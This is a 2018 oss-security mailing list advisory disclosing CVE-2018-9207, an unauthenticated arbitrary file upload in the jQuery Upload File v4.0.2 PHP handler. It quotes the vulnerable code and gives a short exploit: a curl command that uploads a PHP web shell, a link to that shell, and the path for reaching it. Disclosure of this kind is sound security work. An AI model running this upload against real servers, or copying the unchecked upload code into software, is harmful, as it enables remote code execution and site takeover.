[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Arbitrary file upload vulnerability in jQuery Upload File v4.0.2
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2018-11-20 22:07:09
Message-ID: 0677039D-F0D3-4CE6-98B1-7D688CBBC375 () me ! com
[Download RAW message or body]

Title:  Arbitrary file upload vulnerability in Hayageek jQuery Upload File v4.0.2
Author:  Larry W. Cashdollar, @_larry0
Date:  2018-11-02
CVE-ID:[ CVE-2018-9207
CWE:  CWE-434 arbitrary file upload
Download Site:  http://hayageek.com/docs/jquery-upload-file.php
Vendor:  Hayageek
Vendor Notified:  2018-11-02
Vendor Contact:  hayageek@gmail.com
Advisory:  http://www.vapidlabs.com/advisory.php?v=206

Description:  jQuery Upload File plugin provides Multiple file Uploads with progress bar.Works \
with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that \
supports standard HTML form file uploads.

Vulnerability:
The code in https://github.com/hayageek/jquery-upload-file/blob/master/php/upload.php doesn't \
check for a file type or for requiring any authentication allowing a user to upload an \
executable file to the /uploads/ directory if it exists. \
if(!is_array($_FILES["myfile"]["name"])) //single file { $fileName = $_FILES["myfile"]["name"]; \
move_uploaded_file($_FILES["myfile"]["tmp_name"],$output_dir.$fileName); $ret[]= $fileName; } \
else //Multiple files, file[] { $fileCount = count($_FILES["myfile"]["name"]); for($i=0; $i < \
$fileCount; $i++) { $fileName = $_FILES["myfile"]["name"][$i]; \
move_uploaded_file($_FILES["myfile"]["tmp_name"][$i],$output_dir.$fileName); $ret[]= $fileName; \
}

Exploit Code:
1. $ curl  -F  "myfile=@shell.php" "http://example.com/jquery-upload-file/php/upload.php"
2. ["shell.php"]
3.   
4. Where shell is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php
5.   
6.   
7. Shell is located http://example.com/jquery-upload-file/php/uploads/shell.php


[prev in list] [next in list] [prev in thread] [next in thread]